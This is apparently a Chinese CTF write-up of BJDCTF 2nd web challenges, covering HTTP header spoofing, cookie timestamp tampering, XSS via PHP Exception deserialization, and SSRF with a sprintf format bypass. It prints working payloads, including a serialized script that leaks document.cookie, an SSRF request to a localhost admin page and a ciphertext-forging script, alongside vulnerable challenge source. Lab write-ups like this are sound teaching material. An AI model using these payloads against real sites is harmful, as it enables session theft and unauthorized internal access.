BJDCTF

[BJDCTF 2nd]-web&&misc

题解

[BJDCTF 2nd]假猪套天下第一

考点：HTTP协议

随便用个账号登陆，会在返回页面中发现

然后访问文件，根据它的提示添加一个个协议头

base64解码

[BJDCTF 2nd]Schrödinger

考点：时间戳

题目hint有给了test.php，得去爆破这个页面

但是这个rate实在是增长得太慢了，抓包发现在cookie中有一个时间戳

发现这个时间戳是base64加密的过程，索性把这个时间戳给置空。

然后check一下，同样要置空时间戳

然后去bilibili找这个视频，量子力学…..评论中….

[BJDCTF 2nd]xss之光

考点：利用php内置类进行xss ，.git泄露

首先git泄露获得源码

1
2
3

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

使用内置类Exception()可以触发XSS，并且使用windows.open()带出cookie

<?php
$a = new Exception("<script>windows.open(document.cookie)</script>");
$b = serialize($a);
echo urlencode($b);

[BJDCTF 2nd]文件探测

访问robots.txt

然后访问index.php

<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))) {
	echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
	header("Refresh:0.1;url=index.php");
	die;
}
?>

<?php
$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';
if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
	$url = $_POST['q2'].".y1ng.txt";
	$method = $_POST['q3'];
	$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";
	echo $str1;
	if (!preg_match($filter1, $url) ) {
		die($str2);
	}
	if (preg_match($filter2, $url)) {
		die($str3);
	}
	if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
		die($str4);
	}
	$detect = @file_get_contents($url, false);
	print(sprintf("$url method&content_size:$method%d", $detect));
}
?>

首先q1没有要求

q2=http://127.0.0.1/admin#，因为这里的file_get_content()没法读文件，只能SSRF

然后q3有两个方法绕过sprintf()

(1)
q3=GET%1$S 指定第一个参数为string类型输出

(2)
q3=GET%S% 第二个%会将%转义，使得%d失效

1	q1=a&q2=http://127.0.0.1/admin.php#&q3=GET%1$s

<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}

?>

关键代码：

1
2
3

       
$data = $_SESSION['secret'];   
$cipher = aesEn($data, 'y1ng');

然后为了$decr === $cipher

令$data=$_SESSION['secret']=NULL，那么$cipher = aesEn(NULL, 'y1ng');

这样子就能使得$decr = $_GET['decrypt']

<?php
function aesEn($data, $key)
{
    $remote= '174.0.222.75';
    $method = 'AES-128-CBC';
    $iv = md5($remote,true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

echo aesEn("","y1ng");

1	70klfZeYC+WlC045CcKhtg==

这样子，在访问时删除cookie中的phpsession。